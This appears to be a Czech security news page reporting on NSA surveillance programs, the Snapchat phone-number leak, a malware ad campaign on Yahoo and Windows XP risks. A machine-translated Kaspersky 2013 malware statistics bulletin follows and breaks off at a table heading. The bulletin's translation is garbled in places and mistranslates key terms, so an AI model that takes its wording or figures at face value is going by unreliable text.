Der Spiegel ve své zprávě vychází z dokumentu pocházejícího z roku 2008. NSA v něm o programu používaném k nabourání zařízení hovoří jako o softwarovém implantátu, který ji umožňuje z iPhonu stáhnout jakákoliv uživatelská data nebo použít mikrofon a fotoaparát telefonu.
Není jasné, jestli německý deník tento dokument získal opět od Edwarda Snowdena. Je však zřejmé, že pro Apple se článek objevil v tu nejméně vhodnou dobu. Applu se totiž podařilo uzavřít obchodní partnerství s čínským operátorem China Mobile, díky kterému společnost konečně získá přístup na trh s obrovským množstvím potenciálních zákazníků. Jakýkoliv náznak toho, že jsou iPhony sledovány americkou vládou, se tak Applu v tuto chvíli opravdu nehodí.
NSA se v dokumentu, ze kterého cituje Der Spiegel, chvástá 100% úspěšností svého programu při infiltraci do zařízení s operačním systémem iOS. Podle bezpečnostního výzkumníka a zároveň autora článku Jacoba Appelbauma se tak nabízejí dvě možnosti: Buď NSA disponuje obrovským množstvím nástrojů, díky kterým se do produktů Applu dostává, nebo mu v tom pomáhá samotný Apple.
V uniklém dokumentu se o konkrétních praktikách nic nepíše. Druhou možnost zase Apple vehementně popírá. Společnost prý s NSA nikdy nespolupracovala na vytváření zadních vrátek do žádného ze svých produktů. V podobném duchu se dříve vyjádřilo i Cisco, jehož produkty se rovněž objevily na seznamu zneužitých zařízení.
Útočníci zveřejnili kontakty uživatelů Snapchatu
17.1.2014 Incidenty | Kriminalita
Telefonní čísla více než 4,6 milionů uživatelů Snapchatu byla spárována s uživatelskými jmény a zveřejněna na internetu několik dní poté, co výzkumná bezpečnostní společnost na zranitelné místo této služby poukázala.
„Tato databáze obsahuje uživatelská jména a telefonní čísla většiny uživatelů Snapchatu,“ stálo v příspěvku na webových stránkách SnapchatDB.info, které již byly hostingovou společností zrušeny, přesto je databáze stále dostupná z mezipaměti.
Kyberzločinci informace o telefonních číslech získali díky chybě v poslední aktualizaci Snapchatu a podle svých slov je zveřejnili proto, aby na tento problém upoutali pozornost. „Společnost nebyla ochotná chybu opravit včas. Firmy, kterým své informace svěřujeme, by měly být při nakládání s nimi opatrnější,“ napsal útočník.
Poslední dvě číslice kontaktních informací byly však odstraněny, kyberzločinec tím chtěl předejít spamu a dalšímu možnému zneužití, na webu ale ponechal výzvu k tomu, aby ho zájemci kontaktovali pro necenzurovanou verzi, kterou by útočník za určitých okolností mohl v budoucnosti také zveřejnit.
Společnost Gibson Security minulý týden vydala funkční koncept kódu, který využívá vlastnosti API „find_friends“. Tato funkce dokáže na krátký okamžik spojit telefonní čísla uživatelů s jejich účtem. Gibson na tuto zranitelnost společně s dalšími problémy poukázal již v srpnu.
„Pokud by někdo byl teoreticky schopný nahrát velkou sadu telefonních čísel, například všechna americká čísla nebo čísla z jedné oblasti, mohl by z výsledků vytvořit databázi a uživatelská jména s čísly spojit,“ napsala minulý týden společnost Snapchat. „Během let jsme však implementovali celou řadu bezpečnostních pojistek, aby to nebylo tak jednoduché. Nedávno jsme také přidali další opatření, která mají za úkol bojovat se spamem a zneužitím.“
„Lidé často používají na celém internetu stejné uživatelské jméno, takže je jednoduché tyto informace využít k nalezení telefonního čísla na základě informací z Facebooku nebo Twitteru,“ uváděl dále web SnapchatDB.info.
Gibson po zveřejnění databáze řekl, že o tom nic neví, ale že to bylo pouze otázkou času. Snapchat tento problém zatím nijak nekomentoval.
Evan Spiefel, zakladatel a majitel této mladé služby zaměřené na výměnu krátkých zpráv s omezenou životností na podzim loňského roku údajně odmítl nabídku Facebooku na odkup, která se blížila hranici tří miliard dolarů.
NSA vyvíjí kvantový dešifrovací superpočítač
17.1.2014 Šifrování
Americká Národní bezpečnostní agentura (NSA) pracuje na novém typu superpočítače, který by byl teoreticky schopen prolomit většinu současných šifrovačních klíčů.
Projekt na výstavbu „kryptograficky užitečného kvantového počítače“ je součástí výzkumu s názvem „Pronikání do obtížných cílů“, na němž se pracuje v College Parku v americkém státě Maryland. Informaci o projektu přinesl deník The Washington Post s odkazem na dokumenty vynesené Edwardem Snowdenem.
U šifrování je nejdůležitější to, jaké množství času by zabralo útočníkovi získat šifrovací klíč – čím déle to trvá, tím větší investice jsou potřebné. S tím, jak jsou počítače čím dál výkonnější, jsou využívány i delší šifrovací klíče, které je složitější prolomit. V současné době mají standardní klíče, jež střeží citlivé informace, 256 a více bitů. I s využitím velmi výkonného systému by podle expertů trvalo prolomení 256bitových klíčů několik let.
Kvantové počítače však zaběhlou praxi mění. Oproti tradičním počítačům, které zpracovávají jednotlivé bity s informacemi, jež představují buďto nulu nebo jedničku, kvantové počítače využívají kvantové bity, v nichž je obsažena hodnota jedničky a nuly naráz. Pokud si říkáte, jak je to možné, nejste sami. I největší světoví experti na kvantové počítače do detailu neví, jak to celé vlastně funguje – shodují se však na jedné věci, a to dopadu technologie na šifrovací klíče. Jelikož každý kvantový bit má v sobě obsažen naráz jedničku i nulu, řetezec kvantových bitů může obsahovat zároveň všechna čísla. To znamená, že budoucí počítače budou moci provádět několik výpočtů v jednom kroku, nikoli jeden za druhým, jak je tomu nyní. Rozlousknutí šifrovacích klíčů tak bude hračkou.
To je alespoň teorie. Vědci budou muset kvantové počítače schopné provádět komplexní matematické operace teprve vyvinout a vypadá to, že program NSA, do něhož americká civilní rozvědka investovala již osmdesát milionů dolarů, je určen přesně k tomu. Otázkou tak zůstává, za jak dlouho bude podobné zařízení schopné provozu.
Podvodná reklama na Yahoo zotročila počítače pro bitcoin
17.1.2014 Kriminalita | Hacking
Až 2 milióny evropských uživatelů si do svých počítačů stáhlo malware poté, co klikli na reklamu umístěnou na domovské stránce Yahoo.
Některé z infikovaných počítačů se poté bez vědomí jejich majitelů zapojily do těžby virtuální měny bitcoin, čímž mohlo dojít k jejich výraznému zpomalení.
Yahoo sklidilo vlnu kritiky kvůli pomalé reakci na vzniklý problém. Společnost odmítala říci, kolika uživatelů by se problém mohl týkat, a postiženým uživatelům neposkytla žádnou pomoc ani nenabídla nějaké rychlé řešení.
Ve svém pozdějším prohlášení Yahoo uvedlo: „V období od 31. prosince do 3. ledna se na našich evropských stránkách objevila inzerce, která nesplňovala naše publikační pravidla – přesněji řečeno, šířila malware.“ Uživatelům na jiných kontinentech se škodlivá reklama nezobrazila. Stejně tak se problém nijak nedotkl majitelů Maců a mobilních zařízení.
„Budeme i nadále pokračovat v hledání a blokování všech reklam používaných k takovým aktivitám. Naše uživatele budeme brzy informovat o dalších krocích,“ ujistilo Yahoo.
Podle bezpečnostní firmy Light Cyber, která Yahoo na problém koncem prosince upozornila, jeden ze šířených programů zapojoval uživatelské počítače do těžby bitcoinu. V praxi to znamená, že na infikovaných zařízeních docházelo k provádění složitých výpočtů, což znemožnilo jejich běžné používání.
Nizozemská společnost Fox IT odhaduje, že v období, kdy se škodlivá reklama běžně zobrazovala evropským uživatelům, docházelo přibližně k 27 tisícům infekcí za hodinu. Pokud by se tedy reklama zobrazovala ve stejné intenzitě po dobu 3 dnů, znamenalo by to, že infikovány byly téměř 2 milióny počítačů.
Útočníci k instalaci malwaru využili neopravených zranitelností ve starších verzích Javy. Pokud si tedy pravidelně stahujete nejnovější aktualizace, pak se vás problém zřejmě nijak netýká.
Na Windows XP se chystají hackeři, čekají žně
17.1.2014 Bezpečnost
Riziko, že si počítač nakazíte malwarem, je v případě Windows XP až šestkrát vyšší než u Windows 8. Tvrdí to Microsoft ve své zprávě Security Intelligence Report 15. Problémem jsou však podle firmy Kaspersky i neřešené zranitelnosti.
Ta analyzuje informace o počítačových hrozbách z více než miliardy systémů na celém světě a zaměřuje se i na dopady používání operačního systému Windows XP po skončení jeho podpory, k němuž dojde za tři měsíce - 8. dubna 2014. Windows XP se podle StatCounter v současnosti celosvětově používá přibližně na 18 % počítačů, v ČR je to zhruba 21 %.
PodleTima Rainse, ředitele divize Microsoft Trustworthy Computing, v momentě, kdy Windows XP přestane dostávat bezpečnostní aktualizace, vzrostou rizika spojená s používáním zastaralého softwaru, neboť řada hackerů se právě kvůli ukončení podpory na tento systém zaměří.
Mezi zdokonalení, které novější verze Windows přinesly v oblasti ochrany proti škodlivému softwaru, podle výrobce patří:
Spouštění aplikací v úplně oddělených prostorech (sandbox aplikace), které znemožňuje škodlivému softwaru šířit se za hranice jedné aplikace.
Náhodné přidělování bloků operační paměti aplikacím (Address Space Layout Randomization), které omezuje možnosti přímého útoku na prostor operační paměti počítače.
Zabezpečený start počítače (vyžaduje novější hardware podporující standard UEFI), který znemožňuje škodlivému softwaru eliminovat antivirovou ochranu při startu.
Poslední verze Windows XP, které již podpora skončila, je Service Pack 2. V posledních dvou letech vzrostl počet nakažení malwarem u této verze v porovnání s podporovanou verzí Windows XP SP3 prý o 66 %.
XP třeba neumožňují instalaci posledních verzí webových prohlížečů, jako např. Internet Explorer od verze 9, který rovněž přinesl některá zásadní zlepšení ochrany proti webovým serverům šířícím škodlivý software.
Zdrojem problémů mohou být i neřešené zranitelnosti. Podle zprávy Kaspersky Lab jsou právě zranitelnosti v běžných programech hlavním zdrojem infekcí v podnikových počítačích a úniků kriticky důležitých dat.
Zhruba 43 % českých respondentů uvedlo, že se jim to v jejich organizaci stalo za posledních 12 měsíců minimálně jednou. Česko je na tom v porovnání se světovým průměrem v průzkumu (39 %) o něco hůř.
Celkem 82 % dotázaných firem zaznamenalo nějaký interní bezpečnostní incident v IT a zranitelnosti byly jejich nejčastější příčinou. 17 % českých respondentů z podnikových odvětví kvůli nim utrpělo únik dat, 6 % pak únik kriticky důležitých dat vedoucích k finančním ztrátám.
Nová funkce Gmailu budí obavy o soukromí uživatelů
17.1.2014 IT | Bezpečnost
Uživatelé Gmailu dostanou brzy možnost posílat zprávy ostatním majitelům poštovního účtu od Googlu bez ohledu na to, jestli znají jejich e-mailovou adresu.
Nová funkce bude dostupná těm uživatelům, kteří vlastní aktivní účet na Gmailu i na sociální síti Google+. Uživatelé Gmailu budou moci přímo v poli pro zadání adresy příjemce listovat seznamem svých kontaktů z Google+ a těm pak posílat zprávy. Přesné znění e-mailové adresy přitom nemusejí vůbec znát.
Google novou funkci představil na oficiálním blogu. Podle produktového manažera Davida Nachuma je hlavním cílem usnadnit emailovou komunikaci mezi uživateli Gmailu a Googlu+.
Nová funkce je volitelná. Uživatelé si ji mohou z vlastního rozhraní odstranit a současně mohou umožnit kontakt pouze lidem, které mají na Google+ ve svých kruzích. Ve výchozím nastavení funkce je nicméně dovoleno vše.
Nástroj tak přirozeně vyvolává obavy o možné narušení uživatelského soukromí. Nejvíce kritikům vadí fakt, že uživatelům budou přicházet zprávy od naprosto cizích uživatelů.
Podle Nachuma budou uživatelé na spuštění nové funkce upozorněni a bude jim vysvětleno, jak změnit její výchozí nastavení. Současně upozornil, že emailová adresa nebude kontaktům z Google+ viditelná až do chvíle, než její majitel odpoví na první zprávu.
Ze strany Googlu jde o další krok v propojování Gmailu s vlastní sociální sítí. Naposledy takto zavedl pravidlo, že registrací v Gmailu se uživatelům automaticky vytvoří také účet v Google+.
NSA umí špehovat i zařízení nepřipojená k internetu
17.1.2014 Špionáž
Zdá se, že pro americkou Národní bezpečnostní agenturu neexistují při špehování žádné hranice.
Představte si následující situaci: Íránský úředník vlastní notebook, ve kterém má uložené detailní informace o tamním (údajném) programu vývoje jaderných zbraní. Zařízení s přísně tajnými materiály není možné připojit k internetu, což má zabránit jeho napadení. Útočník by zkrátka k získání citlivých informací musel teoreticky mít k notebooku fyzický přístup.
Naneštěstí pro Íránce však toto zařízení obsahuje malý plošný spoj s rádiovým vysílačem, který komunikuje přes tajné rádiové frekvence.
V osm kilometrů vzdáleném hotelovém pokoji na okraji Teheránu sedí agent NSA s kufříkem obsahujícím zařízení pro komunikaci s vysílačem umístěným v údajně bezpečném íránském notebooku. Stáhne si z něj všechny informace o jaderném programu a jako bonus do něj nainstaluje svůj malware.
Ačkoliv to může znít jako úvodní sekvence z nového špionážního trháku, podle deníku The New York Times to k realitě nemá daleko. Podobným způsobem se prý NSA dostávala do zabezpečených zařízení bez připojení k internetu po celém světě.
K přenosům citlivých dat měla NSA používat speciálně vysílače umístěné do zdánlivě neškodných elektronických součástek – plošných spojů nebo USB kabelů. S takto vybavenými počítači prý dokáže komunikovat až na vzdálenost 13 kilometrů. Kromě získávání dokumentů a instalace malwaru je prý využívala či stále využívá i ke sledování uživatelů.
The New York Times ve zprávě mluví až o 100 tisících zasažených zařízeních. Vychází přitom z dokumentů získaných od Edwarda Snowdena. Mezi nejčastější terče patřily ruská a čínská armáda či různé drogové kartely.
V prohlášení, které se deníku podařilo získat od tiskové mluvčí NSA, agentura popírá, že by tuto metodu používala i ke špehování cílů na území USA. Vždy prý byla využívána ke zpravodajské činnosti na území cizích států.
Google a spol. brojí proti špehování uživatelů
17.1.2014 Špionáž
Velké technologické firmy vyzvaly americkou vládu k přehodnocení stávající „sledovací politiky“.
Osm firem – Google, Apple, Facebook, Twitter, AOL, Microsoft, LinkedIn a Yahoo – spojilo své síly a pod hlavičkou nové organizace Reform Government Surveillance Group prosazují zásadní reformu amerického špionážního programu.
Skupina odeslala americkému prezidentovi a členům tamního Kongresu dopis, ve kterém vyjadřuje své znepokojení nad současnou mírou špehování internetových uživatelů, která podle nich zásadním způsobem podkopává lidskou svobodu.
„Chápeme, že stát musí chránit své občany. Vzhledem k nastalým skutečnostem však cítíme potřebu upozornit na nutnost zásadní reformy globálního špionážního programu,“ píše se v otevřeném dopisu, který skupina zveřejnila na svých stránkách.
Skupina upozorňuje na rostoucí vliv státu na úkor jednotlivce. Stále častěji prý dochází k porušování občanských práv zaručených americkou ústavou. „Dochází k porušování svobody, které si všichni tak ceníme. Nastal čas na změnu.“
Krok osmi technologických gigantů přichází v době, kdy už celým světem několik měsíců otřásá velký špehovací skandál amerických tajných služeb, jehož startovacím motorem byl whistleblower Edward Snowden, který se momentálně skrývá někde v Rusku.
Bývalý spolupracovník americké Národní bezpečnostní agentury (NSA) poskytl médiím velké množství informací o způsobech, jakými NSA narušovala soukromí mnoha lidí po celém světě – od odposlouchávání telefonních hovorů, přes sledování internetové komunikace až po zneužití mezikontinentálních optických kabelů.
Členové proreformní skupiny považují dosud zveřejněné informace za dostatečný důkaz chybějící kontroly nad americkým sledovacím programem. „Vládnímu shromažďování informací chybí jasné limity a větší transparentnost,“ řekl zakladatel Facebooku Mark Zuckerberg.
Některé z firem zapojených do proreformní iniciativy byly americkými úřady samy požádány o poskytnutí určitých dat o vybraných uživatelích. Své zapojení potvrdili Apple, Microsoft, Google, Yahoo a Facebook.
Společnosti žádaly vládu o povolení zveřejnit počet a povahu poskytnutých dat, aby se tak předešlo jakýmkoliv spekulacím. Zatím neúspěšně.
NSA zneužívá cookie ke špehování uživatelů
12.12.2013 Špionáž
Soubory cookie, které firmy používají například pro zobrazování cílené reklamy, jsou pro NSA zdrojem zajímavých informací o sledovaných osobách.
Jak ve svém článku uvádí deník Washington Post, využívání cookies je v Americké bezpečnostní agentuře omezeno spíše na sledování konkrétních podezřelých osob. Nedá se prý říci, že by v NSA probíhala jakási plošná analýza všech získaných dat tohoto typu.
Prestižní deník ve své zprávě vychází z interních dokumentů NSA, které získal od bývalého spolupracovníka organizace Edwarda Snowdena.
Ve středu zájmu NSA jsou cookies zvané PREF, které obsahují informace o internetové historii a preferencích konkrétních uživatelů, čehož Google následně využívá k personalizaci obsahu webových stránek, nejčastěji k reklamě.
Tyto cookies sice neobsahují žádné identifikační údaje jako jméno nebo e-mailovou adresu. Obsahují však informace o uživatelově lokaci, jazykových preferencích, nastavení vyhledávače a další data umožňující internetovým inzerentům zasáhnout požadovanou cílovou skupinu.
NSA tak podle Washington Postu využívá cookies především ke zjištění internetových návyků sledovaných osob. Snáze pak také může naplánovat způsob, jakým se dostane do uživatelského počítače.
Interní dokumenty zveřejněné Snowdenem nepopisují konkrétní způsob, jakými dochází k vniknutí do uživatelských zařízení. Ani se v nich neuvádí, jak se NSA dostává k samotným souborům cookie. Podle jedné z teorií se tak děje na základě federálního zákona FISA.
Vedle cookies NSA zneužívá také informací o aktuálních lokacích mobilních zařízení, které sbírají tvůrci mobilních aplikací a operačních systémů. Google a jiné společnosti těchto dat využívají k zobrazování reklam souvisejících nějakým způsobem s aktuální pozicí uživatele. Pro NSA jde však jen o další nástroj pro sledování pohybu podezřelých osob. Organizace geolokační data sbírá pomocí softwaru příznačně nazvaného Happyfoot.
Mluvčí NSA ve svém vyjádření pro Washington Post odmítla komentovat konkrétní metody používané organizací ke sledování lidí. Pouze zopakovala závazek agentury chránit stát proti každému, kdo by mu chtěl škodit.
Bulletin Kaspersky Security 2013. Celkové statistiky pro rok 2013
11.12.2013 Zdroj Kaspersky
Analýza
Obsah
2013 v číslech
Mobilní hrozby
Významné události
Statistika
Hlavní zjištění
Zranitelné aplikace využívané zločinci
On-line hrozeb (útoky přes web)
Top 20 škodlivých programů na internetu
Země, kde se on-line zdrojů nasazený s malware: TOP 10
Země, kde se uživatelé setkávají nejvyšší riziko infekce on-line
Místní hrozby
Top 20 škodlivé objekty zjištěné na uživatelských počítačích
Země, kde se uživatelé setkávají nejvyšší riziko lokální infekce
Tato část zprávy tvoří součást Věstníku Kaspersky Security 2013 a je založen na údajích získaných a zpracovaných pomocí Kaspersky Security Network (KSN). KSN integruje technologie cloud-based do osobních a firemních produktů, a je jedním ze společnosti Kaspersky Lab nejdůležitějších inovací.
Statistiky v této zprávě jsou založeny na údajích získaných z produktů společnosti Kaspersky Lab, instalované na počítačích uživatelů na celém světě a byly získány s plným souhlasem uživatelů zapojených.
2013 v číslech
Podle údajů KSN, v roce 2013 produkty společnosti Kaspersky Lab neutralizován 5 188 740 554 kybernetické útoky na uživatele počítačů a mobilních zařízení
104 427 byly zjištěny nové úpravy škodlivých programů pro mobilní zařízení.
Produkty Kaspersky Lab se neutralizuje 1 700 870 654 útokům z on-line zdrojů umístěných po celém světě.
Produkty Kaspersky Lab zjištěn téměř 3 miliardy malware útoky na počítačích uživatelů. Celkem 1,8 milionu byly zjištěny v těchto útoků škodlivých a potenciálně nežádoucích programů.
45% webových útoků neutralizuje produkty společnosti Kaspersky Lab bylo zahájeno před škodlivými webových zdrojů umístěných v USA a Rusku.
Mobilní hrozby
Mobilní svět je jednou z nejrychleji se rozvíjející IT bezpečnostní oblasti. V roce 2013 bezpečnostní otázky kolem mobilních telefonů dosáhl nových výšek a dosáhnout nové úrovně zralosti z hlediska kvality i kvantity. Pokud 2011 byl rokem, kdy mobilní malware impulz, a to zejména v Android-zemi, a rok 2012 byl rokem mobilního diverzifikace malware, pak 2013 viděl mobilní malware zletilosti. Není žádným velkým překvapením, že mobilní malware se blíží k PC hrozeb z hlediska cybercriminal obchodních modelů a technické metody, ale rychlost tohoto vývoje je pozoruhodné.
Obad, pravděpodobně nejvýznamnější objev v mobilní oblasti, je distribuován několika způsoby, včetně předem sestaveného botnet. Smartphony Android na bázi infikovaných virem Trojan-SMS.AndroidOS.Opfake.a slouží jako multiplikátory, posílání textových zpráv, které obsahují škodlivé odkazy na každý kontakt na zařízení oběti. To bylo běžnou praxí v PC hrozeb, a je populární služba poskytovaná Bot pastevců v underground cybercriminal ekonomice.
Mobilní botnety vlastně nabízí významné výhody ve srovnání s tradičními botnety: smartphony jsou zřídka vypnout, takže botnet mnohem spolehlivější, protože téměř všichni jeho aktiva jsou vždy k dispozici a připraven pro nové instrukce. Běžné úkoly vykonávané botnety patří hromadné nevyžádané pošty-out, DDoS útoky a masovou špionáž na osobní údaje, všechny z nich nejsou náročné akce, z hlediska výkonnosti a snadno dosáhnout na chytré telefony. MTK botnet, objevit se na začátku roku 2013, a Opfake, mezi mnoha jinými, jsou důkazem toho, že mobilní botnety jsou již jen hřiště pro zločinci, ale staly běžnou praxí sloužit hlavní cíl: finanční zisk.
Významné události
Mobilní bankovnictví trojské koně
Tyto zahrnují mobilní phishing, krádež informací o kreditních kartách, z bankovní karty do mobilního účtu a nakonec na QIWI peněženku. V roce 2013 jsme také viděli mobilní trojské koně, které by mohly zkontrolovat bilanci oběti, aby byla zajištěna maximální zisk.
Mobilní Botnety
Jak je uvedeno výše, botnet funkcí nabízí větší flexibilitu při ilegálních peněz tvorby programů. Tento trend se nyní dosáhl mobilní svět a je zde k pobytu. Podle našich odhadů asi 60% z mobilního malware zahrnuje prvky velkých nebo malých botnetů.
Backdoor. . AndroidOS Obad
Tento malware je pravděpodobně zjištěno, že data, včetně ohromující celkem ze tří činů, backdoor, SMS Trojan a schopností bot a dalších funkcí. Je to druh švýcarský armádní nůž, který zahrnuje celou řadu různých nástrojů.
Použití GCM pro kontrolu botnetů
kybernetických zločinců objevili způsob, jak používat Google Cloud Messaging (GCM) pro ovládání zombie zařízení v botnetu. Tato metoda se používá u relativně malého počtu škodlivých programů, ale některé z nich jsou velmi rozšířené. Provádění příkazů přijatých od GCM se provádí pomocí GCM systému a je možné je zablokovat přímo na infikované zařízení.
APT útoky proti ujgurských aktivistů
jsme viděli i Windows a Mac OS X malware nasazeny proti. PDF, XLS, DOC a ZIP soubory byly zaslány v e-mailech provádět útoky v minulosti. APK soubory byly nyní přidány do arzenálu, špehuje osobní informace uložené v přístroji oběti a také Vysílání jeho umístění.
Chyby zabezpečení v Android
Stručně řečeno, jsme viděli využije cílení Android ke třem účelům: k obcházení zařízení Android app integrity kontrolu instalace (také známý jako Master Key zranitelnosti, K získání zvýšené práv, a bránit analýzu app. Druhé dva typy byly také použity v Obad.
Útoky na PC přes zařízení Android
I když jsme viděli, PC malware, který může infikovat smartphony, jsme také narazili, že to je naopak. Pokud je infikovaný Android zařízení připojené k počítači v režimu emulace USB flash disk, jeho nebezpečný náklad se spustí.
Statistika
Co se týče mobilních operačních systémů, které jsou cílené malware, nic se výrazně změnila v roce 2013. Android je stále cílové číslo jedna, přitahuje neuvěřitelných 98,05% známých malware. Žádný jiný OS dostane všude blízko, jak je vidět níže. Důvody pro to jsou vedoucí postavení Android je na trhu, prevalence app obchodů třetích stran a fakt, že Android má poměrně otevřenou architekturu, takže je snadno použitelný jak pro app vývojáři a malware autorů podobně. Neočekáváme, že by se tento trend změnit, blízké budoucnosti.
Mobilní distribuce malware podle platformy
Do dnešního dne jsme shromáždili 8260509 unikátních malware instalační balíčky. Všimněte si, že různé instalační balíčky mohou spouštět aplikace se stejnými funkcemi. Rozdíl je v malware rozhraní a, například, obsah textových zpráv pošlou ven.
Celkový počet mobilních vzorků malwaru v naší kolekci je 148778 v době psaní - 104.421 z nich byly nalezeny v roce 2013. Sama října vidělo 19966 úpravy, polovina celkového že Kaspersky Lab nalézt v celku roku 2012. Naštěstí, to je daleko od situace, prožíváme v PC světě, kde jsme zpracovat proud více než 315.000 vzorků malwaru denně v naší laboratoři. Přesto, trend je nepřehlédnutelný a pokračuje.
Počet mobilních malware vzorků v naší sbírce
Mezi mobilní malware, trojské koně SMS jsou stále v čele pole:
Malware rozdělení podle typu chování
Nicméně, SMS trojské koně, až na několik výjimek, se vyvinuly do roboty, takže můžeme snadno spojit s lídry obou do jedné kategorie - Backdoor Malware. Takže, 62% škodlivých aplikací jsou prvky mobilních botnetů.
Hlavní zjištění
Všechny techniky a mechanismy infekce a malware se pohybují velmi rychle z počítače na Android díky otevřenosti a popularitě mobilní platformy.
Většina škodlivých mobilních aplikací jsou zaměřeny především na krádeže peněz a za druhé, na krádeže osobních údajů.
Většina z mobilního malwaru je tvořena roboty s bohatými funkcemi sady. V blízké budoucnosti, nákup a prodej mobilních botnetů je pravděpodobné, že začne.
Online bankovnictví je jasný cíl pro mobilní malware. Počítačoví zločinci se sleduje vývoj mobilního bankovnictví. Pokud smartphone úspěšně napaden, ale zkontrolujte, zda je tento telefon je upoutaná na bankovní karty.
Zranitelné aplikace využívané zločinci
Následující hodnocení zranitelných aplikací jsou založeny na údajích o hrdinských činech blokovány našich výrobků a používaných zločinci a to jak v internetových útoků a v ohrožení lokálních aplikací, včetně mobilních zařízení uživatelů.
Distribuce využije v kybernetických útoků typu napadl aplikace
90.52% ze všech detekovaných pokusů o zneužití zranitelností cílené Oracle Java. Tyto chyby jsou využívány drive-by útoky prováděné přes internet, a nové Java exploity jsou v současné době působí v mnoha využívat balení. Více informací naleznete v našem článku o Java využije .
Na druhém místě je pořízena kategorii "Součásti systému Windows", včetně zranitelných operačního systému Windows soubory, které se nevztahují na Internet Explorer a Microsoft Office - jsme přiřadili do samostatné kategorie. Většina útoků v této kategorii se zaměřují na zranitelnosti objevené v win32k.sys - CVE-2011-3402 - který byl poprvé použit v roce Duqu.
Na třetím místě s 2,5% se využije pro Android. Počítačoví zločinci (a sami někdy uživatelů) používat Android zranitelnosti s cílem získat oprávnění uživatele root, který poskytuje neomezené schopnosti manipulovat systému. Tato porušení se nepoužívají v drive-by útoky, a využije pro ně jsou detekovány buď antivirem, jestli tam byl pokus o stažení aplikace obsahující využít, nebo pomocí souboru antivirus, když využívají je k dispozici na zařízení. Nedávno bylo oznámeno, že prohlížeč Chrome pro Nexus 4 a Samsung Galaxy S4 obsahoval chybu , která by mohla být použita na budoucí využití android zranitelnosti v drive-by útoky.
Distribuce verzí operačního systému Windows nainstalován na počítačích uživatelů, 2013
Mezi uživatele produktů společnosti Kaspersky Lab, kteří souhlasili se podílet na KSN, 61,5% použití verze systému Windows 7 (5% více než v loňském roce), 6,3% použití Windows XP (7,75% méně než v roce 2012).
On-line hrozeb (útoky přes web)
Statistiky v této části byly odvozeny z webových antivirových komponentů, které chrání uživatele při škodlivý kód se pokusí stáhnout z infikovaných webových stránek. Infikované webové stránky mohou být vytvořeny uživatelů se zlými úmysly, nebo by mohly být tvořeny uživatelem přispěl obsah (jako fór) a legitimních zdrojů, které byly pirát.
Počet útokům z internetových zdrojů umístěných po celém světě vzrostl z 1 595 587 670 v roce 2012 na 1 700 870 654 . To znamená, že produkty společnosti Kaspersky Lab chráněny uživatelům průměrně 4 659 920 krát za den, kdy byly on-line.
Oproti loňskému roku došlo k poklesu tempa růstu útoků založených na prohlížeči. Počet neutralizované webových útoků v roce 2013 je 1,07 krát více než v roce 2012, zatímco v roce 2012 se jednalo o 1,7. Hlavním nástrojem za útoky na bázi prohlížeče je stále využívat balíček, který dává počítačoví zločinci surefire způsob napadení oběti počítačů, které nemají nainstalován bezpečnostní produkt, nebo mají alespoň jednu oblíbenou aplikaci, která je zranitelná (vyžaduje aktualizace zabezpečení).
Top 20 škodlivých programů na internetu
Identifikovali jsme top 20 nejvíce aktivních škodlivých programů se podílejí na webových útoků na počítače uživatelů. Tento seznam představuje 99,9% všech internetových útoků.
Jméno * % Ze všech útoků **
1 Škodlivý URL 93.01%
2 Trojan.Script.Generic 3,37%
3 AdWare.Win32.MegaSearch.am 0,91%
4 Trojan.Script.Iframer 0,88%
5 Exploit.Script.Blocker 0.49%
6 Trojan.Win32.Generic 0,28%
7 Trojan-Downloader.Script.Generic 0,22%
8 Trojan-Downloader.Win32.Generic 0,10%
9 Hoax.SWF.FakeAntivirus.i 0.09%
10 Exploit.Java.Generic 0.08%
11 Exploit.Script.Blocker.u 0.08%
12 Exploit.Script.Generic 0.07%
13 Trojan.JS.Iframe.aeq 0,06%
14 Packed.Multi.MultiPacked.gen 0,05%
15 AdWare.Win32.Agent.aece 0,04%
16 WebToolbar.Win32.MyWebSearch.rh 0,04%
17 AdWare.Win32.Agent.aeph 0,03%
18 Hoax.HTML.FraudLoad.i 0,02%
19 AdWare.Win32.IBryte.heur 0,02%
20 Trojan-Downloader.HTML.Iframe.ahs 0,02%
* Tyto statistiky představují detekce rozsudky antivirového modulu webového a byly předloženy uživatelé produkty společnosti Kaspersky Lab, kteří souhlasili, aby se podělili o své lokální data.
** Procento unikátních incidentů zaznamenaných webových antivirus na uživatelských počítačích.
Oproti roku 2012 došlo k nárůstu podílu na černé listině škodlivých odkazů blokovaných (škodlivého URL v 1. st místě). Nové, vylepšené detekční technologie, které se spoléhají na schopnosti KSN měly za následek podílu hrozeb detekovaných pomocí heuristických metod stoupající z 87% na 93% v průběhu minulého roku. Většina škodlivých URL detekce byly pro webové stránky, které obsahují exploity a místa přesměrování na zneužití.
V tomto Top 20 hostů Sedm záznamy byly verdikty identifikační hrozby, které jsou během pokusů drive-by útoky, které jsou v současné době nejběžnější způsob útoku na webové škodlivého kódu šířeného blokovány. Jsou heuristické verdikty Trojan.Script.Generic, Trojan.Script.Iframer, Exploit.Script.Blocker, Trojan-Downloader.Script.Generic, Exploit.Java.Generic, Exploit.Script.Generic a non-heuristické. Tyto výroky jsou přiřazeny skripty, které přesměrovávají na zneužití, jakož i samotných využije.
V 9. ročníku místě je soubor záblesk detekován jako Hoax.SWF.FakeAntivirus.i, která obsahuje animace napodobující činnost antivirového programu. "Skenování" na počítači oběti odhalí obrovské množství "infekce", které vyžadují specializované bezpečnostní řešení. Oběť je vyzván, aby odeslat textovou zprávu na krátkou čísla a přijímá odkaz, takže tzv. řešení lze stáhnout. Flash soubory, jako je tento, se může objevit na stránkách s reklamními bannery, které čas od času patří přesměrování na nevyžádaný obsah.
V 18. místě je Hoax.HTML.FraudLoad.i, detekován jako stránku HTML, která napodobuje okno známý soubor ke stažení:
Uživatelé mohou skončit na tyto druhy stránek z různých ruskojazyčných stažení stránky, které nabízejí hry, software a filmů. Mají tendenci být hostitelem zdarma hosting zdrojů. Pokud uživatel klikne na "Uložit", jsou přesměrováni na hosting stránky souboru, kde jsou vyzváni ke stažení souboru po zaplacení předplatného prostřednictvím textové zprávy. Nicméně, po splnění všech požadavků, namísto přijímání požadovaných uživatelé obsahu si textový soubor s pokyny k použití vyhledávače, nebo, ještě hůře, škodlivé programy.
Existuje více adware verdikty v letošním hodnocení než v roce 2012, se celkový podíl roste z 0,3% na 1,04%.
Země, kde se on-line zdrojů nasazený s malware: TOP 10
